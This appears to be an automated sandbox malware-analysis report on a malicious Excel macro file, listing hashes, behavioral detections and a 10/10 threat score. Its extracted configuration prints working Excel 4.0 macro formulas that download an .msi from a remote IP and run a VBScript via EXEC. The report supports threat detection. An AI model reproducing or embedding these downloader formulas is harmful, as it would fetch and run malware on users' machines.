General
-
Target
27bf04a23d1e8e9211d8ac52d4e402fd
-
Size
6KB
-
Sample
231221-3lrypaddg2
-
MD5
27bf04a23d1e8e9211d8ac52d4e402fd
-
SHA1
e8bc0c80b2099eb4c51aeef9b5873bfb2974aa75
-
SHA256
d360be15b2c924e258e65b96ad5b4cb755669c0f047dcd5d9e79ab7a156a4a47
-
SHA512
244d6d42ed10ab1620565a7905ebf5c2c500434c4d112166d8492dfb12b97739b3d52a4b4b0e3e54183fc517ad5797fdcb2cdb89e71707093677021c11853296
-
SSDEEP
192:NDSyuSgbrA2OmmfRz8UhHFBFYu1b98yhy+B:NFudM2wB1FYgb98yhp
Static task
static1
Behavioral task
behavioral1
Sample
27bf04a23d1e8e9211d8ac52d4e402fd.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
27bf04a23d1e8e9211d8ac52d4e402fd.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Targets
-
-
Target
27bf04a23d1e8e9211d8ac52d4e402fd
-
Size
6KB
-
MD5
27bf04a23d1e8e9211d8ac52d4e402fd
-
SHA1
e8bc0c80b2099eb4c51aeef9b5873bfb2974aa75
-
SHA256
d360be15b2c924e258e65b96ad5b4cb755669c0f047dcd5d9e79ab7a156a4a47
-
SHA512
244d6d42ed10ab1620565a7905ebf5c2c500434c4d112166d8492dfb12b97739b3d52a4b4b0e3e54183fc517ad5797fdcb2cdb89e71707093677021c11853296
-
SSDEEP
192:NDSyuSgbrA2OmmfRz8UhHFBFYu1b98yhy+B:NFudM2wB1FYgb98yhp
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-